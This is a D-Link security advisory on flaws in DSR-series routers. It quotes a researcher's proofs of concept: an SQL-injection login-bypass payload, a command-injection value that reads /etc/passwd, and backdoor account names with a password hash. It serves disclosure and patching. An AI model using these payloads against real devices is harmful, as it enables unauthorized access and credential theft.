Overview
The D-Link DSR-150/150N/250/250N/500/500N/1000/1000N business service routers are under security incident advisory for multiple vulnerabilites. Exploiting these vulnerabilities could result in data being compromised and the system to be unrellaible and untrusted in a live production network.
D-Link Security Incident Reponse Policy
All public communication on this issue will be offered at http://securityadvisories.dlink.com/security/
Our security response team can be contacted for incident information or to report incidents at security@dlink.com
Any non-critical security issue, help in updating firmware, or configuration regarding this issue please contact your D-Link Customer care channel.
Reference
- CVE-2013-5945: Authentication Bypass by SQL-Injection - Link
- CVE-2013-5946: Privilege Escalation by Arbitrary Command Execution - Link
- CVE-2012-5958, CVE-2012-5959, CVE-2012-5961,CVE-2012-5962, CVE-2012-5963, CVE-2012-5964, CVE-2012-5965 - UPnP Vulnerabiliteis - Link
- Persistent admin credentials resulting in a backdoor access - Link
- Use of weak hash algorithms - Link
- Passwords are stored as plain text in config files - Link
- Vulnerability: Bad permissions on /etc/shadow - Link
General Disclosure
Security and performance is of the utmost importance to D-Link across all product lines. This is not just through the development process but also through regular firmware updates to comply with the current safety and quality standards. We are proactively working with the sources of these reports as well as continuing to review across the complete product line to ensure that the vulnerabilities discovered are addressed. We will continue to update this page to include the relevant product firmware updates addressing these concerns. In the meantime, you can exercise the below cautions to avoid unwanted intrusion into your D-Link product.
Immediate Recommendations for all D-Link device customers
- If you receive unsolicited e-mails that relates to security vulnerabilities and prompt you to action, please ignore it. When you click on links in such e-mails, it could allow unauthorised persons to access your router. Neither D-Link nor its partners and resellers will send you unsolicited messages where you are asked to click or install something.
- Make sure that your wireless network is secure.
- Do not provide your admin password to anyone. If required we suggest updating the password frequently.
Details
The D-Link DSR-150/150N/250/250N/500/500N/1000/1000N are suceptible to multiple vulnerabilities that may allow mallicious attacker access to the device, modify it's configuration, and change features to benefit further exploits. Exploiting these vulnerabilities could result in data being compromised and the system to be unrellaible and untrusted in a live production network.
The following information is extracted directly from the author of the reported vulnerability:
Authentication Bypass by SQL-Injection (CVE-2013-5945)
Proof of Concept:=====
* Possible via the global webUI login form.
* File /pfrm2.0/share/lua/5.1/teamf1lualib/login.lua contains:
function login.authenticate(tablename, tableInput)
local username = tableInput["Users.UserName"]
local password = tableInput["Users.Password"]
local cur = db.execute(string.format([[
SELECT *, ROWID AS _ROWID_ FROM %s
WHERE %s = '%s' AND %s = '%s'
]], tablename, "UserName", username, "Password", password))
local result = false
local statusCode = "NONE"
if cur then
local row = cur:fetch({}, "a")
cur:close()
result = row ~= nil
if result == false then
statusCode = "USER_LOGIN_INVALID_PASSWORD"
end
end
return result, statusCode
end
* This function creates an SQL statement of the form:
SELECT * FROM "Users" WHERE "UserName" = 'user' AND "Password" = 'pass';
* Since there is a default admin user account called "admin" around, this is
easily exploitable by providing this to the login form:
username = admin
password = ' or 'a'='a
* ...resulting in this SQL statement:
SELECT *
FROM "Users"
WHERE "UserName" = 'admin'
AND "Password" = '' or 'a'='a';
* Old school SQL injection. Ohh, by the way...
* The same fault can be found in captivePortal.lua
-- FREE NETWORKS FOR EVERYONE --
All proper permissions, ownerships have been audited and vulnerable user/credentials have been removed from the system
Privilege Escalation by Arbitrary Command Execution (CVE-2013-5946)
* Possible from the Tools --> System Check page.
* File /pfrm2.0/var/www/systemCheck.htm contains:
local function runShellCmd(command)
local pipe = io.popen(command .. " 2>&1") -- redirect stderr to stdout
local cmdOutput = pipe:read("*a")
pipe:close()
return cmdOutput
end
if (ButtonType and ButtonType == "ping") then
[...]
local cmd_ping = pingprog .. " " .. ipToPing .. " " .. options1 .. " > " .. pingfile
globalCmdOutput = runShellCmd (cmd_ping)
statusMessage = "Pinging " .. ipToPing
[...]
elseif (ButtonType and ButtonType == "traceroute") then
[...]
local cmd = traceRouteProg .. " " .. ipToTraceRoute .. options
globalCmdOutput = runShellCmd(cmd)
statusMessage = "Traceroute To " .. ipToTraceRoute .. "..."
[...]
elseif (ButtonType and ButtonType == "dnslookup") then
[...]
util.appendDebugOut("Exec = " .. os.execute(nsLookupProg .. " " .. internetNameToNsLookup .. " > " .. nsLookupFile))
statusMessage = "DNS Lookup for " .. internetNameToNsLookup
[...]
* Command injection is possible in at least these form sections:
Ping or Trace an IP Address
Perform a DNS Lookup
* When using a browser, deactivate the "onclick" JavaScript checks using
a tool like Firebug. Tools like curl are not hindered by these checks.
* All forms allow input like this:
localhost;<command>
example:
localhost;cat /etc/passwd
* This user provided value is then directly used as part of the input for the
call to runShellCmd(c) and thus io.popen(c) in the first form section and
os.execute(c) in the second form section.
* Output from user provided commands gets displayed on the next page beneath
the benign command output.
example:
[...]
<textarea rows="15" name="S1" cols="60" wrap="off" class="txtbox1">
traceroute to localhost (127.0.0.1), 10 hops max, 40 byte packets
1 localhost (127.0.0.1) 0.429 ms 0.255 ms 0.224 ms
root:!:0:0:root:/root:/bin/sh
gkJ9232xXyruTRmY:$1$MqlhcYXP$CC3cvqpCg0RJAzV85LSeO0:0:0:root:/:/bin/sh
nobody:x:0:0:nobody:/nonexistent:/bin/false
ZX4q9Q9JUpwTZuo7:x:0:2:Linux User,,,:/home/ZX4q9Q9JUpwTZuo7:/bin/sh
guest:x:0:1001:Linux User,,,:/home/guest:/bin/sh
admin:x:0:2:Linux User,,,:/home/admin:/bin/sh
</textarea>
[...]
All proper permissions, ownerships have been audited and vulnerable user/credentials have been removed from the system
UPnP Vulnerabiliteis (CVE-2012-5958, CVE-2012-5959, CVE-2012-5961,CVE-2012-5962, CVE-2012-5963, CVE-2012-5964, CVE-2012-5965)
This family devices utilizes the Intel libupnp library. The stack maintenance was closed years ago, thus several patches had to be made directly the stack for it to close the vulnerabilities mentioned in these CVEs.
Under the guidence of resources involved with designing the intel libupnp library we have patched Intel SDK libupnp v1.3.1 to add the following; 1) use
'snprintf' and 'strncpy' instead of 'sprintf' and 'strcpy', 2) While doing a 'strncpy', check if we are copying more bytes than the destination string size.
Persistent Admin User
* This was the contents of my /etc/passwd after I upgraded to 1.08B39_WW:
root:!:0:0:root:/root:/bin/sh
gkJ9232xXyruTRmY:$1$MqlhcYXP$CC3cvqpCg0RJAzV85LSeO0:0:0:root:/:/bin/sh
nobody:x:0:0:nobody:/nonexistent:/bin/false
ZX4q9Q9JUpwTZuo7:x:0:2:Linux User,,,:/home/ZX4q9Q9JUpwTZuo7:/bin/sh
guest:x:0:1001:Linux User,,,:/home/guest:/bin/sh
admin:x:0:2:Linux User,,,:/home/admin:/bin/sh
* You can see the old D-Link backdoor user name "ZX4q9Q9JUpwTZuo7".
That was the account I hacked before with my previous exploit:
http://www.exploit-db.com/papers/22930/
And there is a new backdoor user "gkJ9232xXyruTRmY" introduced.
Instead of removing the backdoor, D-Link just created a new one.
* I verified this by showing the /etc/profile:
# /etc/profile
LD_LIBRARY_PATH=.:/pfrm2.0/lib:/lib
PATH=.:/pfrm2.0/bin:$PATH
CLISH_PATH=/etc/clish
export PATH LD_LIBRARY_PATH CLISH_PATH
# redirect all users except root to CLI
if [ "$USER" != "gkJ9232xXyruTRmY" ] ; then
trap "/bin/login" SIGINT
trap "" SIGTSTP
/pfrm2.0/bin/cli
exit
fi
PS1='DSR-250N> '
All proper permissions, ownerships have been audited and vulnerable user/credentials have been removed from the system.
Use of Weak Hash Algorithms
* In the /etc/shadow, salted DES hashes are used to store user passwords.
Since this hash type supports at most 8 characters, users can log in by just
typing the first 8 letters of their passwords when using SSH or telnet.
* An effective password length limitation of 8 characters makes brute force
attacks on user accounts very feasible, even if the user chose a longer
password.
Improvements to this algorithms have been made to correct the issue and increase the safety of users data.
Passwords Stored in Plain-Text
* A lookup into the system config file /tmp/teamf1.cfg.ascii, from which the
/tmp/system.db is built on boot time, reveals that all user passwords are
stored in plain text.
Example:
[...]
Users = {}
Users[1] = {}
Users[1]["Capabilities"] = ""
Users[1]["DefaultUser"] = "1"
Users[1]["UserId"] = "1"
Users[1]["FirstName"] = "backdoor"
Users[1]["OID"] = "0"
Users[1]["GroupId"] = "1"
Users[1]["UserName"] = "gkJ9232xXyruTRmY"
Users[1]["Password"] = "thisobviouslyisafakepass"
Users[1]["UserTimeOut"] = "10"
Users[1]["_ROWID_"] = "1"
Users[1]["LastName"] = "ssl"
[...]
We have implemented proper storage and restricted handling of configurations stored on the device.
Incorrect Permissions on /etc/shadow
* This file should have 600 permissions set and not 644. It is world readable.
Pointless, since every process runs as root, no user separation is
done anyway.
DSR-250N> ls -l -a /etc/shadow
-rw-r--r-- 1 root root 115 Sep 27 15:07 /etc/shadow
DSR-250N> ps
PID USER VSZ STAT COMMAND
1 root 2700 S init
2 root 0 SW< [kthreadd]
3 root 0 SW< [ksoftirqd/0]
4 root 0 SW< [events/0]
5 root 0 SW< [khelper]
8 root 0 SW< [async/mgr]
111 root 0 SW< [kblockd/0]
120 root 0 SW< [khubd]
123 root 0 SW< [kseriod]
128 root 0 SW< [kslowd]
129 root 0 SW< [kslowd]
150 root 0 SW [pdflush]
151 root 0 SW [pdflush]
152 root 0 SW< [kswapd0]
200 root 0 SW< [aio/0]
210 root 0 SW< [nfsiod]
220 root 0 SW< [crypto/0]
230 root 0 SW< [cns3xxx_spi.0]
781 root 0 SW< [mtdblockd]
860 root 0 SW< [usbhid_resumer]
874 root 0 SW< [rpciod/0]
903 root 0 SWN [jffs2_gcd_mtd4]
909 root 0 SWN [jffs2_gcd_mtd5]
918 root 3596 S unionfs -s -o cow,nonempty,allow_other /rw_pfrm2.0=R
999 root 1816 S < /pfrm2.0/udev/sbin/udevd --daemon
1002 root 2988 S /pfrm2.0/bin/platformd /tmp/system.db
1003 root 3120 S /pfrm2.0/bin/evtDsptchd /tmp/system.db
1049 root 2704 S /usr/sbin/telnetd -l /bin/login
1097 root 4560 S /pfrm2.0/bin/wlanClientArlFlushd
1141 root 37000 S /pfrm2.0/bin/sshd
1154 root 3068 S /pfrm2.0/bin/linkStatusDetect /tmp/system.db WAN1 5
1255 root 3148 S /pfrm2.0/bin/nimfd /tmp/system.db
1259 root 3068 S /pfrm2.0/bin/linkStatusDetect /tmp/system.db WAN2 5
1375 root 3588 S /pfrm2.0/bin/firewalld /tmp/system.db
1560 root 0 SW< [key_timehandler]
1598 root 7776 S /pfrm2.0/bin/racoon -a 8787 -f /var/racoon_path.conf
1600 root 8036 S rvgd /tmp/system.db
1612 root 0 SW [cavium]
1621 root 8424 S vpnKAd /tmp/system.db
1685 root 5372 S /pfrm2.0/sslvpn/bin/firebase -d
1702 root 5016 S /pfrm2.0/sslvpn/bin/smm -d
1711 root 6052 S /pfrm2.0/sslvpn/bin/httpd
1712 root 2700 S /bin/sh /var/sslvpn/var/httpdKeepAlive.sh
1771 root 2680 S /pfrm2.0/bin/statusD
1933 root 3092 S /pfrm2.0/bin/loggingd /tmp/system.db
1960 root 5284 S /pfrm2.0/bin/radEap -d /tmp/system.db
1962 root 2988 S /pfrm2.0/bin/rebootd /tmp/system.db
2004 root 2988 S /pfrm2.0/bin/crond /tmp/system.db
2008 root 3260 S /pfrm2.0/bin/ntpd /tmp/system.db
2196 root 3128 S /pfrm2.0/bin/intelAmtd /tmp/system.db
2205 root 1904 S /pfrm2.0/bin/fReset
2311 root 2704 S /bin/sh /pfrm2.0/bin/release_cache.sh
2312 root 2704 S /sbin/getty -L ttyS0 115200 vt100
2463 root 3964 S /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg30 -lf /va
2481 root 3964 S /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg50 -lf /va
3355 root 1768 S /pfrm2.0/bin/rt2860apd
3443 root 4116 S /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg40 -lf /va
3451 root 4116 S /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg20 -lf /va
3457 root 3964 S /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg1 -lf /var
3484 root 7836 S /pfrm2.0/bin/snmpd -p /var/run/snmp.pid
3518 root 4424 S /pfrm2.0/bin/openvpn --config /var/openvpn/openvpn.c
3630 root 1928 S /pfrm2.0/bin/dnsmasq --dns-forward-max=10000 --addn-
5353 root 2704 S -sh
7877 root 2568 S sleep 60
7953 root 2568 S sleep 60
8008 root 2704 R ps
16749 root 2704 S -sh
25690 root 0 SW< [RtmpCmdQTask]
25692 root 0 SW< [RtmpWscTask]
DSR-250N>
All proper permissions, ownerships have been audited and vulnerable user/credentials have been removed from the system.
Affected Products
|
Model Name
|
HW Version
|
Current FW Version
|
New FW Version for this exploit fix
|
|
DSR-150
|
A1
|
V1.07 and lower
|
|
| DSR-150 |
A2 |
V1.07 and lower |
|
| DSR-150N |
A2 |
V1.04 and lower |
|
| DSR-250 |
A1 |
V1.07 and lower |
|
| DSR-250 |
A2 |
V1.07 and lower |
|
| DSR-250N |
A1 |
V1.07 and lower |
|
| DSR-250N |
A2 |
V1.07 and lower |
|
| DSR-500 |
Ax |
V1.07 and lower |
|
| DSR-500N |
Ax |
V1.07 and lower |
|
| DSR-1000 |
Ax |
V1.07 and lower |
|
| DSR-1000N |
Ax |
V1.07 and lower |
|
| DWC-1000 |
Ax |
v4.2.0.3 and lower |
|
Security patches for your D-Link Product
These firmware updates address the security vulnerabilities in affected D-Link products. D-Link will update this continually and we strongly recommend all users to install the relevant updates.
As there are different hardware revisions on our products, please check this on your device before downloading the correct corresponding firmware update. The hardware revision information can usually be found on the product label on the underside of the product next to the serial number. Alternatively, they can also be found on the device web configuration.